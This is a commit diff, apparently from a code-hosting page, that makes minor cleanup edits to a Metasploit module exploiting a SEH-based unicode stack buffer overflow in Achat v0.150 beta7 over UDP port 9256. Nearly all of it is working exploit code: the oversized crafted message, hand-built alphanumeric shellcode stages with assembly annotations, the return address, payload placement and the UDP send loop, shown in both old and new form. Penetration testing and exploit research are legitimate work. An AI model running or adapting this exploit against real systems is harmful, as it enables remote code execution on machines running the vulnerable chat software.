Do minor cleanup
parent
ac6879cfe1
commit
86f3bcad11
|
@ -15,17 +15,16 @@ class Metasploit3 < Msf::Exploit::Remote
|
|||
super(update_info(info,
|
||||
'Name' => 'Achat v0.150 beta7 Buffer Overflow',
|
||||
'Description' => %q{
|
||||
This module exploits a SEH based unicode stack buffer overflow in Achat v0.150,
|
||||
by sending a crafted message to the default harcoded port 9256. The message
|
||||
overflows the stack and overwrites the SEH handler. The exploit is reliable, but
|
||||
depends of timing. It has two distinct threads that are overflowing the stack in
|
||||
the same time. Tested on Windows XP SP3 and Windows 7.
|
||||
The overflow was found by Peter Kasza.
|
||||
This module exploits an unicode SEH based stack buffer overflow in Achat v0.150. By
|
||||
sending a crafted message to the default port 9256 it's possible to overwrites the
|
||||
SEH handler. Even when the exploit is reliable it depends of timing since there are
|
||||
two threads overflowing the stack in the same time. This module has been tested on
|
||||
Windows XP SP3 and Windows 7.
|
||||
},
|
||||
'Author' =>
|
||||
[
|
||||
'Balazs Bucsay <balazs.bucsay[-at-]rycon[-dot-]hu>', # Exploit, Metasploit module
|
||||
'Peter Kasza <peter.kasza[-at-]itinsight[-dot-]hu>' # Vulnerability discovery
|
||||
'Peter Kasza <peter.kasza[at]itinsight.hu>', # Vulnerability discovery
|
||||
'Balazs Bucsay <balazs.bucsay[at]rycon.hu>' # Exploit, Metasploit module
|
||||
],
|
||||
'License' => MSF_LICENSE,
|
||||
'References' =>
|
||||
|
@ -45,16 +44,15 @@ class Metasploit3 < Msf::Exploit::Remote
|
|||
'EncoderType' => Msf::Encoder::Type::AlphanumUnicodeMixed,
|
||||
'EncoderOptions' =>
|
||||
{
|
||||
'BufferRegister' => 'EAX',
|
||||
'BufferRegister' => 'EAX'
|
||||
}
|
||||
|
||||
},
|
||||
'Platform' => 'win',
|
||||
'Targets' =>
|
||||
[
|
||||
# Tested OK Windows XP SP3, Windows 7
|
||||
# Not working on Windows Server 2003
|
||||
[ 'Achat beta v0.150 / Windows XP SP3 / Windows 7 SP1', { 'Ret' => "\x2A\x46" } ], #AChat.exe
|
||||
# Tested OK Windows XP SP3, Windows 7
|
||||
# Not working on Windows Server 2003
|
||||
[ 'Achat beta v0.150 / Windows XP SP3 / Windows 7 SP1', { 'Ret' => "\x2A\x46" } ] #ppr from AChat.exe
|
||||
],
|
||||
'Privileged' => false,
|
||||
'DefaultTarget' => 0,
|
||||
|
@ -62,7 +60,7 @@ class Metasploit3 < Msf::Exploit::Remote
|
|||
|
||||
register_options(
|
||||
[
|
||||
Opt::RPORT(9256),
|
||||
Opt::RPORT(9256)
|
||||
], self.class)
|
||||
end
|
||||
|
||||
|
@ -85,20 +83,20 @@ class Metasploit3 < Msf::Exploit::Remote
|
|||
# 0043 00 ADD BYTE PTR DS:[EBX],AL # padding
|
||||
# 59 POP ECX # padding
|
||||
# 0039 ADD BYTE PTR DS:[ECX],BH # padding
|
||||
firststage = "\x55\x2A\x55\x6E\x58\x6E\x05\x14\x11\x6E\x2D\x13\x11\x6E\x50\x6E\x58\x43\x59\x39"
|
||||
first_stage = "\x55\x2A\x55\x6E\x58\x6E\x05\x14\x11\x6E\x2D\x13\x11\x6E\x50\x6E\x58\x43\x59\x39"
|
||||
|
||||
sploit = "A0000000002#Main" + "\x00" + "Z"*114688 + "\x00" + "A"*10 + "\x00"
|
||||
sploit << "A0000000002#Main" + "\x00" + "A"*57288 + "AAAAASI"*50 + "A"*(3750-46)
|
||||
sploit << "\x62" + "A"*45 # 0x62 will be used to calculate the right offset
|
||||
sploit = 'A0000000002#Main' + "\x00" + 'Z' * 114688 + "\x00" + "A" * 10 + "\x00"
|
||||
sploit << 'A0000000002#Main' + "\x00" + 'A' * 57288 + 'AAAAASI' * 50 + 'A' * (3750 - 46)
|
||||
sploit << "\x62" + 'A' * 45 # 0x62 will be used to calculate the right offset
|
||||
sploit << "\x61\x40" # POPAD + INC EAX
|
||||
|
||||
sploit << target.ret # AChat.exe p/p/r address
|
||||
|
||||
# adjusting the first thread's unicode payload, tricky asm-fu
|
||||
# the first seh exception jumps here, firststage variable will be executed
|
||||
# the first seh exception jumps here, first_stage variable will be executed
|
||||
# by the second seh exception as well. It needs to be in sync with the second
|
||||
# thread, so that is why we adjust eax/ebp to have a close pointer to the
|
||||
# payload, then firststage variable will take the rest of the job.
|
||||
# payload, then first_stage variable will take the rest of the job.
|
||||
# 0043 00 ADD BYTE PTR DS:[EBX],AL # padding
|
||||
# 55 PUSH EBP # ebp with close pointer to payload
|
||||
# 006E 00 ADD BYTE PTR DS:[ESI],CH # padding
|
||||
|
@ -113,22 +111,20 @@ class Metasploit3 < Msf::Exploit::Remote
|
|||
# 50 PUSH EAX # saving eax
|
||||
# 0043 00 ADD BYTE PTR DS:[EBX],AL # padding
|
||||
# 5D POP EBP # mov ebp, eax
|
||||
sploit << "\x43\x55\x6E\x58\x6E\x2A\x2A\x05\x14\x11\x43\x2d\x13\x11\x43\x50\x43\x5D" + "C"*9 + "\x60\x43"
|
||||
sploit << "\x43\x55\x6E\x58\x6E\x2A\x2A\x05\x14\x11\x43\x2d\x13\x11\x43\x50\x43\x5D" + 'C' * 9 + "\x60\x43"
|
||||
sploit << "\x61\x43" + target.ret # second nseh entry, for the second thread
|
||||
sploit << "\x2A" + firststage + "C"*(157-firststage.length-31-3) # put address of the payload to EAX
|
||||
sploit << payload.encoded + "A"*(1152-payload.encoded.length) # placing the payload
|
||||
sploit << "\x00" + "A"*10 + "\x00"
|
||||
|
||||
sploit << "\x2A" + first_stage + 'C' * (157 - first_stage.length - 31 -3) # put address of the payload to EAX
|
||||
sploit << payload.encoded + 'A' * (1152 - payload.encoded.length) # placing the payload
|
||||
sploit << "\x00" + 'A' * 10 + "\x00"
|
||||
|
||||
i = 0
|
||||
while i < sploit.length do
|
||||
if i > 172000
|
||||
Rex::sleep(1.0)
|
||||
end
|
||||
udp_sock.put(sploit[i..i+8192-1])
|
||||
i += 8192
|
||||
sent = udp_sock.put(sploit[i..i + 8192 - 1])
|
||||
i += sent
|
||||
end
|
||||
|
||||
disconnect_udp
|
||||
end
|
||||
|
||||
|
|
Loading…
Reference in New Issue